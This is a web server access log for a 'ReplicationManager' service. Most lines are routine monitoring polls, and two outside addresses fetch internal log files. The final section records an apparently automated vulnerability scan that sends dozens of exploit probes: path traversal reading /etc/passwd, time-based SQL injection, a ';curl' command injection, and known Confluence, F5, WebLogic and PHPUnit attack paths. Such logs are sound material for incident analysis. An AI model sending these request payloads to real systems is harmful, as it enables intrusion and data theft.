83.212.98.101 - - [20/Oct/2024:09:56:11 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
83.212.98.101 - - [20/Oct/2024:10:00:45 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
83.212.98.101 - - [20/Oct/2024:10:01:11 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
83.212.98.101 - - [20/Oct/2024:10:05:45 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
83.212.98.101 - - [20/Oct/2024:10:06:11 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
83.212.98.101 - - [20/Oct/2024:10:10:45 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
83.212.98.101 - - [20/Oct/2024:10:11:11 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
83.212.98.101 - - [20/Oct/2024:10:15:45 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
83.212.98.101 - - [20/Oct/2024:10:16:11 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
83.212.98.101 - - [20/Oct/2024:10:20:45 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
83.212.98.101 - - [20/Oct/2024:10:21:11 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
83.212.98.101 - - [20/Oct/2024:10:25:45 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
83.212.98.101 - - [20/Oct/2024:10:26:11 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
83.212.98.101 - - [20/Oct/2024:10:30:45 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
83.212.98.101 - - [20/Oct/2024:10:31:11 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
83.212.98.101 - - [20/Oct/2024:10:35:45 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
83.212.98.101 - - [20/Oct/2024:10:36:11 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
83.212.98.101 - - [20/Oct/2024:10:40:44 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
83.212.98.101 - - [20/Oct/2024:10:41:11 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
83.212.98.101 - - [20/Oct/2024:10:45:45 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
83.212.98.101 - - [20/Oct/2024:10:46:11 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
83.212.98.101 - - [20/Oct/2024:10:50:45 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
83.212.98.101 - - [20/Oct/2024:10:51:11 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
83.212.98.101 - - [20/Oct/2024:10:55:45 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
83.212.98.101 - - [20/Oct/2024:10:56:11 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
83.212.98.101 - - [20/Oct/2024:11:00:45 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
83.212.98.101 - - [20/Oct/2024:11:01:11 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
77.87.163.227 - - [20/Oct/2024:11:04:09 +0000] GET /ReplicationManager/api/api_v1/status HTTP/1.1 200 137
83.212.98.101 - - [20/Oct/2024:11:05:45 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
83.212.98.101 - - [20/Oct/2024:11:06:11 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
77.87.163.227 - - [20/Oct/2024:11:09:56 +0000] GET /ReplicationManager/api/api_v1/status HTTP/1.1 200 137
83.212.98.101 - - [20/Oct/2024:11:10:45 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
83.212.98.101 - - [20/Oct/2024:11:11:11 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
83.212.98.101 - - [20/Oct/2024:11:15:46 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
83.212.98.101 - - [20/Oct/2024:11:16:12 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
83.212.98.101 - - [20/Oct/2024:11:20:45 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
83.212.98.101 - - [20/Oct/2024:11:21:11 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
83.212.98.101 - - [20/Oct/2024:11:25:45 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
83.212.98.101 - - [20/Oct/2024:11:26:11 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
83.212.98.101 - - [20/Oct/2024:11:30:45 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
83.212.98.101 - - [20/Oct/2024:11:31:11 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
83.212.98.101 - - [20/Oct/2024:11:35:45 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
83.212.98.101 - - [20/Oct/2024:11:36:11 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
83.212.98.101 - - [20/Oct/2024:11:40:45 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
83.212.98.101 - - [20/Oct/2024:11:41:11 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
83.212.98.101 - - [20/Oct/2024:11:45:45 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
83.212.98.101 - - [20/Oct/2024:11:46:11 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
83.212.98.101 - - [20/Oct/2024:11:50:45 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
83.212.98.101 - - [20/Oct/2024:11:51:11 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
83.212.98.101 - - [20/Oct/2024:11:55:45 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
83.212.98.101 - - [20/Oct/2024:11:56:11 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
83.212.98.101 - - [20/Oct/2024:12:00:45 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
83.212.98.101 - - [20/Oct/2024:12:04:26 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
83.212.98.101 - - [20/Oct/2024:12:05:45 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
83.212.98.101 - - [20/Oct/2024:12:07:26 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
83.212.98.101 - - [20/Oct/2024:12:10:45 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
83.212.98.101 - - [20/Oct/2024:12:12:26 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
83.212.98.101 - - [20/Oct/2024:12:15:45 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
83.212.98.101 - - [20/Oct/2024:12:17:26 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
83.212.98.101 - - [20/Oct/2024:12:20:46 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
83.212.98.101 - - [20/Oct/2024:12:22:26 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
83.212.98.101 - - [20/Oct/2024:12:25:45 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
83.212.98.101 - - [20/Oct/2024:12:27:27 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
83.212.98.101 - - [20/Oct/2024:12:30:45 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
83.212.98.101 - - [20/Oct/2024:12:32:26 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
83.212.98.101 - - [20/Oct/2024:12:35:45 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
83.212.98.101 - - [20/Oct/2024:12:37:26 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
83.212.98.101 - - [20/Oct/2024:12:40:51 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
83.212.98.101 - - [20/Oct/2024:12:42:26 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
83.212.98.101 - - [20/Oct/2024:12:45:45 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
83.212.98.101 - - [20/Oct/2024:12:47:26 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
83.212.98.101 - - [20/Oct/2024:12:50:45 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
83.212.98.101 - - [20/Oct/2024:12:52:26 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
83.212.98.101 - - [20/Oct/2024:12:55:45 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
83.212.98.101 - - [20/Oct/2024:12:57:26 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
83.212.98.101 - - [20/Oct/2024:13:00:46 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
83.212.98.101 - - [20/Oct/2024:13:02:27 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
77.87.163.227 - - [20/Oct/2024:13:04:09 +0000] GET /ReplicationManager/api/api_v1/status HTTP/1.1 200 137
83.212.98.101 - - [20/Oct/2024:13:05:45 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
83.212.98.101 - - [20/Oct/2024:13:07:26 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
77.87.163.227 - - [20/Oct/2024:13:09:57 +0000] GET /ReplicationManager/api/api_v1/status HTTP/1.1 200 137
83.212.98.101 - - [20/Oct/2024:13:10:45 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
83.212.98.101 - - [20/Oct/2024:13:12:26 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
83.212.98.101 - - [20/Oct/2024:13:15:45 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
83.212.98.101 - - [20/Oct/2024:13:17:26 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
83.212.98.101 - - [20/Oct/2024:13:20:45 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
47.128.50.229 - - [20/Oct/2024:13:21:32 +0000] GET /ReplicationManager/RMLog?log=replicationManager.log.2024-10-15.1 HTTP/1.1 200 45835
83.212.98.101 - - [20/Oct/2024:13:22:27 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
83.212.98.101 - - [20/Oct/2024:13:25:45 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
83.212.98.101 - - [20/Oct/2024:13:27:26 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
83.212.98.101 - - [20/Oct/2024:13:30:45 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
83.212.98.101 - - [20/Oct/2024:13:32:26 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
83.212.98.101 - - [20/Oct/2024:13:35:45 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
83.212.98.101 - - [20/Oct/2024:13:37:26 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
83.212.98.101 - - [20/Oct/2024:13:40:45 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
83.212.98.101 - - [20/Oct/2024:13:42:26 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
83.212.98.101 - - [20/Oct/2024:13:45:45 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
83.212.98.101 - - [20/Oct/2024:13:47:26 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
83.212.98.101 - - [20/Oct/2024:13:50:45 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
83.212.98.101 - - [20/Oct/2024:13:52:26 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
83.212.98.101 - - [20/Oct/2024:13:55:45 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
83.212.98.101 - - [20/Oct/2024:13:57:26 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
83.212.98.101 - - [20/Oct/2024:14:00:45 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
83.212.98.101 - - [20/Oct/2024:14:02:26 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
83.212.98.101 - - [20/Oct/2024:14:05:46 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
83.212.98.101 - - [20/Oct/2024:14:07:26 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
83.212.98.101 - - [20/Oct/2024:14:10:45 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
83.212.98.101 - - [20/Oct/2024:14:12:26 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
83.212.98.101 - - [20/Oct/2024:14:15:45 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
83.212.98.101 - - [20/Oct/2024:14:17:26 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
83.212.98.101 - - [20/Oct/2024:14:20:46 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
83.212.98.101 - - [20/Oct/2024:14:22:26 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
83.212.98.101 - - [20/Oct/2024:14:25:45 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
83.212.98.101 - - [20/Oct/2024:14:27:26 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
83.212.98.101 - - [20/Oct/2024:14:30:45 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
83.212.98.101 - - [20/Oct/2024:14:32:27 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
83.212.98.101 - - [20/Oct/2024:14:35:45 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
83.212.98.101 - - [20/Oct/2024:14:37:26 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
47.128.99.250 - - [20/Oct/2024:14:40:02 +0000] GET /ReplicationManager/RMLog?log=localhost_access_log.2024-10-17.txt HTTP/1.1 200 62354
83.212.98.101 - - [20/Oct/2024:14:40:45 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
83.212.98.101 - - [20/Oct/2024:14:42:26 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
83.212.98.101 - - [20/Oct/2024:14:45:45 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
83.212.98.101 - - [20/Oct/2024:14:47:26 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
83.212.98.101 - - [20/Oct/2024:14:50:45 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
83.212.98.101 - - [20/Oct/2024:14:52:26 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
195.164.49.69 - - [20/Oct/2024:14:55:30 +0000] GET / HTTP/1.1 200 11204
83.212.98.101 - - [20/Oct/2024:14:55:45 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
195.164.49.69 - - [20/Oct/2024:14:56:07 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:14:56:28 +0000] POST /_search?pretty HTTP/1.1 404 1081
195.164.49.69 - - [20/Oct/2024:14:56:29 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:14:56:31 +0000] POST / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:14:56:32 +0000] PUT /fileserver/2nhrXbbCZPsSgB3TWiUauu8YxEu.txt HTTP/1.1 405 1050
195.164.49.69 - - [20/Oct/2024:14:56:33 +0000] GET /fileserver/2nhrXbbCZPsSgB3TWiUauu8YxEu.txt HTTP/1.1 404 1120
195.164.49.69 - - [20/Oct/2024:14:56:34 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:14:56:35 +0000] POST /invoker/JMXInvokerServlet/ HTTP/1.1 404 1108
195.164.49.69 - - [20/Oct/2024:14:56:36 +0000] POST /invoker/EJBInvokerServlet/ HTTP/1.1 404 1108
195.164.49.69 - - [20/Oct/2024:14:56:37 +0000] POST /invoker/readonly HTTP/1.1 404 1094
195.164.49.69 - - [20/Oct/2024:14:56:38 +0000] PUT /2nhrXObmzlch3ytqhGYoSl3jCsk.jsp/ HTTP/1.1 405 1050
195.164.49.69 - - [20/Oct/2024:14:56:39 +0000] GET /2nhrXObmzlch3ytqhGYoSl3jCsk.jsp HTTP/1.1 404 1105
- - - [20/Oct/2024:14:56:40 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [20/Oct/2024:14:56:42 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:14:56:45 +0000] POST /integration/saveGangster.action HTTP/1.1 404 1109
195.164.49.69 - - [20/Oct/2024:14:56:47 +0000] GET /__ HTTP/1.1 404 1076
195.164.49.69 - - [20/Oct/2024:14:56:48 +0000] GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1 404 1148
195.164.49.69 - - [20/Oct/2024:14:56:49 +0000] GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1 404 1156
195.164.49.69 - - [20/Oct/2024:14:56:50 +0000] GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1 404 1160
195.164.49.69 - - [20/Oct/2024:14:56:51 +0000] GET /laravel52/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1 404 1162
195.164.49.69 - - [20/Oct/2024:14:56:52 +0000] GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1 404 1156
195.164.49.69 - - [20/Oct/2024:14:56:53 +0000] GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1 404 1157
195.164.49.69 - - [20/Oct/2024:14:56:54 +0000] POST /account HTTP/1.1 404 1081
195.164.49.69 - - [20/Oct/2024:14:56:56 +0000] POST /account HTTP/1.1 404 1081
195.164.49.69 - - [20/Oct/2024:14:56:56 +0000] POST /soap.cgi?service=whatever-control;curl HTTP/1.1 404 1082
195.164.49.69 - - [20/Oct/2024:14:56:57 +0000] POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1 404 1091
195.164.49.69 - - [20/Oct/2024:14:57:21 +0000] POST /CMSPages/Staging/SyncServer.asmx/ProcessSynchronizationTaskData HTTP/1.1 404 1149
195.164.49.69 - - [20/Oct/2024:14:57:22 +0000] POST /password_change.cgi HTTP/1.1 404 1093
195.164.49.69 - - [20/Oct/2024:14:57:24 +0000] POST /ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.1 404 1126
195.164.49.69 - - [20/Oct/2024:14:57:24 +0000] POST /apply_sec.cgi HTTP/1.1 404 1087
195.164.49.69 - - [20/Oct/2024:14:57:25 +0000] POST /apply_sec.cgi HTTP/1.1 404 1087
83.212.98.101 - - [20/Oct/2024:14:57:26 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
195.164.49.69 - - [20/Oct/2024:14:57:26 +0000] POST /apply_sec.cgi HTTP/1.1 404 1087
195.164.49.69 - - [20/Oct/2024:14:57:27 +0000] GET /solr/admin/cores?wt=json HTTP/1.1 404 1098
195.164.49.69 - - [20/Oct/2024:14:57:29 +0000] GET /Telerik.Web.UI.WebResource.axd?type=rau HTTP/1.1 404 1104
195.164.49.69 - - [20/Oct/2024:14:57:30 +0000] GET /Telerik.Web.UI.WebResource.axd?_TSM_CombinedScripts_=;;System.Web.Extensions,%20Version=4.0.0.0,%20Culture=neutral,%20PublicKeyToken=31bf3856ad364e35:de-DE:db3d9eb3-6d72-4959-b303-32b61119a4a8:ea597d4b:b25378d2 HTTP/1.1 404 1104
195.164.49.69 - - [20/Oct/2024:14:57:32 +0000] POST /wls-wsat/CoordinatorPortType HTTP/1.1 404 1100
195.164.49.69 - - [20/Oct/2024:14:57:33 +0000] POST /wls-wsat/CoordinatorPortType HTTP/1.1 404 1100
195.164.49.69 - - [20/Oct/2024:14:57:33 +0000] POST /rest/tinymce/1/macro/preview HTTP/1.1 404 1118
195.164.49.69 - - [20/Oct/2024:14:57:39 +0000] POST /node/1?_format=hal_json HTTP/1.1 404 1084
195.164.49.69 - - [20/Oct/2024:14:57:40 +0000] POST /service/extdirect HTTP/1.1 404 1095
195.164.49.69 - - [20/Oct/2024:14:57:42 +0000] POST /cgi-bin/supportInstaller HTTP/1.1 404 1102
195.164.49.69 - - [20/Oct/2024:14:57:43 +0000] POST /api/timelion/run HTTP/1.1 404 1098
195.164.49.69 - - [20/Oct/2024:14:57:44 +0000] POST /Autodiscover/Autodiscover.xml HTTP/1.1 404 1107
195.164.49.69 - - [20/Oct/2024:14:57:45 +0000] POST /service/rapture/session HTTP/1.1 404 1105
195.164.49.69 - - [20/Oct/2024:14:57:46 +0000] POST /service/rest/beta/repositories/bower/group HTTP/1.1 404 1136
195.164.49.69 - - [20/Oct/2024:14:57:48 +0000] POST /mifs/.;/services/LogService HTTP/1.1 404 1113
195.164.49.69 - - [20/Oct/2024:14:57:49 +0000] GET /fuel/pages/items/?search_term&published&layout&limit=50&view_type=list&offset=0&order=asc&col=location+AND+(SELECT+1340+FROM+(SELECT(SLEEP(6)))ULQV)&fuel_inline=0 HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:14:57:50 +0000] GET /fuel/login/ HTTP/1.1 404 1093
195.164.49.69 - - [20/Oct/2024:14:57:50 +0000] POST /fuel/login/ HTTP/1.1 404 1093
195.164.49.69 - - [20/Oct/2024:14:57:53 +0000] POST /ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.1 404 1126
195.164.49.69 - - [20/Oct/2024:14:57:56 +0000] GET /check_browser?lang=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1 404 1087
195.164.49.69 - - [20/Oct/2024:14:57:56 +0000] GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd HTTP/1.1 404 1152
195.164.49.69 - - [20/Oct/2024:14:57:57 +0000] GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/f5-release HTTP/1.1 404 1152
195.164.49.69 - - [20/Oct/2024:14:57:58 +0000] GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license HTTP/1.1 404 1152
195.164.49.69 - - [20/Oct/2024:14:57:59 +0000] GET /hsqldb%0a HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:14:58:00 +0000] POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1 404 1120
195.164.49.69 - - [20/Oct/2024:14:58:01 +0000] POST /tmui/locallb/workspace/fileSave.jsp HTTP/1.1 404 1121
195.164.49.69 - - [20/Oct/2024:14:58:02 +0000] POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1 404 1120
195.164.49.69 - - [20/Oct/2024:14:58:03 +0000] POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1 404 1120
195.164.49.69 - - [20/Oct/2024:14:58:04 +0000] POST /EemAdminService/EemAdmin HTTP/1.1 404 1102
195.164.49.69 - - [20/Oct/2024:14:58:05 +0000] POST /api/jsonws/invoke HTTP/1.1 404 1099
195.164.49.69 - - [20/Oct/2024:14:58:06 +0000] POST /api/jsonws/invoke HTTP/1.1 404 1099
195.164.49.69 - - [20/Oct/2024:14:58:07 +0000] POST /pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1 HTTP/1.1 404 1091
195.164.49.69 - - [20/Oct/2024:14:58:08 +0000] GET /menu/ss?sid=nsroot&username=nsroot&force_setup=1 HTTP/1.1 404 1085
195.164.49.69 - - [20/Oct/2024:14:58:09 +0000] GET /menu/neo HTTP/1.1 404 1086
195.164.49.69 - - [20/Oct/2024:14:58:10 +0000] GET /menu/stc HTTP/1.1 404 1086
195.164.49.69 - - [20/Oct/2024:14:58:12 +0000] POST /cgi-bin/mainfunction.cgi HTTP/1.1 404 1102
195.164.49.69 - - [20/Oct/2024:14:58:15 +0000] GET /images/..%2finfo.html HTTP/1.1 400 1169
195.164.49.69 - - [20/Oct/2024:14:58:17 +0000] POST /casa/nodes/thumbprints HTTP/1.1 404 1104
195.164.49.69 - - [20/Oct/2024:14:58:18 +0000] POST /ui/h5-vsan/rest/proxy/service/com.vmware.vsan.client.services.capability.VsanCapabilityProvider/getClusterCapabilityData HTTP/1.1 404 1218
195.164.49.69 - - [20/Oct/2024:14:58:21 +0000] POST /mgmt/shared/authn/login HTTP/1.1 404 1109
195.164.49.69 - - [20/Oct/2024:14:58:23 +0000] POST /users/user-dark-features HTTP/1.1 404 1102
195.164.49.69 - - [20/Oct/2024:14:58:25 +0000] POST /pages/createpage-entervariables.action?SpaceKey=x HTTP/1.1 404 1116
195.164.49.69 - - [20/Oct/2024:14:58:25 +0000] POST /pages/createpage-entervariables.action HTTP/1.1 404 1116
195.164.49.69 - - [20/Oct/2024:14:58:25 +0000] POST /confluence/pages/createpage-entervariables.action?SpaceKey=x HTTP/1.1 404 1131
195.164.49.69 - - [20/Oct/2024:14:58:25 +0000] POST /confluence/pages/createpage-entervariables.action HTTP/1.1 404 1131
195.164.49.69 - - [20/Oct/2024:14:58:25 +0000] POST /wiki/pages/createpage-entervariables.action?SpaceKey=x HTTP/1.1 404 1125
195.164.49.69 - - [20/Oct/2024:14:58:25 +0000] POST /wiki/pages/createpage-entervariables.action HTTP/1.1 404 1125
195.164.49.69 - - [20/Oct/2024:14:58:25 +0000] POST /pages/doenterpagevariables.action HTTP/1.1 404 1111
195.164.49.69 - - [20/Oct/2024:14:58:25 +0000] POST /pages/createpage.action?spaceKey=myproj HTTP/1.1 404 1101
195.164.49.69 - - [20/Oct/2024:14:58:25 +0000] POST /pages/templates2/viewpagetemplate.action HTTP/1.1 404 1122
195.164.49.69 - - [20/Oct/2024:14:58:25 +0000] POST /pages/createpage-entervariables.action HTTP/1.1 404 1116
195.164.49.69 - - [20/Oct/2024:14:58:25 +0000] POST /template/custom/content-editor HTTP/1.1 404 1112
195.164.49.69 - - [20/Oct/2024:14:58:25 +0000] POST /templates/editor-preload-container HTTP/1.1 404 1112
195.164.49.69 - - [20/Oct/2024:14:58:38 +0000] POST /wsman HTTP/1.1 404 1079
195.164.49.69 - - [20/Oct/2024:14:58:40 +0000] POST /./RestAPI/LogonCustomization HTTP/1.1 404 1110
195.164.49.69 - - [20/Oct/2024:14:58:41 +0000] POST /./RestAPI/LogonCustomization HTTP/1.1 404 1110
195.164.49.69 - - [20/Oct/2024:14:58:42 +0000] POST /./RestAPI/Connection HTTP/1.1 404 1102
195.164.49.69 - - [20/Oct/2024:14:58:43 +0000] GET /help/admin-guide/test.jsp HTTP/1.1 404 1107
195.164.49.69 - - [20/Oct/2024:14:58:44 +0000] POST /v1/backend1 HTTP/1.1 404 1089
195.164.49.69 - - [20/Oct/2024:14:58:45 +0000] GET /v1/2nhrXOllULRU5TXa22CbBVzbxQy.php HTTP/1.1 404 1112
195.164.49.69 - - [20/Oct/2024:14:58:47 +0000] GET /client/index.php HTTP/1.1 404 1094
195.164.49.69 - - [20/Oct/2024:14:58:50 +0000] GET /?rest_route=/wc/v3/wishlist/remove_product/1&item_id=0%20union%20select%20sleep(7)%20--%20g HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:14:58:51 +0000] POST /mgmt/tm/util/bash HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:14:58:53 +0000] POST /OA_HTML/BneViewerXMLService?bne:uueupload=TRUE HTTP/1.1 404 1105
195.164.49.69 - - [20/Oct/2024:14:58:54 +0000] GET /OA_CGI/FNDWRR.exe HTTP/1.1 404 1095
195.164.49.69 - - [20/Oct/2024:14:58:55 +0000] POST /OA_HTML/BneViewerXMLService?bne:uueupload=TRUE HTTP/1.1 404 1105
195.164.49.69 - - [20/Oct/2024:14:59:41 +0000] POST /dologin.action HTTP/1.1 404 1088
195.164.49.69 - - [20/Oct/2024:14:59:42 +0000] POST /api/content/ HTTP/1.1 404 1094
195.164.49.69 - - [20/Oct/2024:14:59:43 +0000] GET /2nhrXR7Ooa8uLXfevvl53VfKrAa.jsp HTTP/1.1 404 1105
195.164.49.69 - - [20/Oct/2024:14:59:44 +0000] POST /fileupload/toolsAny HTTP/1.1 404 1097
195.164.49.69 - - [20/Oct/2024:14:59:45 +0000] GET /authenticationendpoint/2nhrxtaox46dq0rtlonvypu1ran.jsp HTTP/1.1 404 1132
195.164.49.69 - - [20/Oct/2024:14:59:49 +0000] POST /vendor/htmlawed/htmlawed/htmLawedTest.php HTTP/1.1 404 1127
195.164.49.69 - - [20/Oct/2024:14:59:50 +0000] GET /login.zul HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:14:59:52 +0000] GET /zimbraAdmin/0MVzAe6pgwe5go1D.jsp HTTP/1.1 404 1110
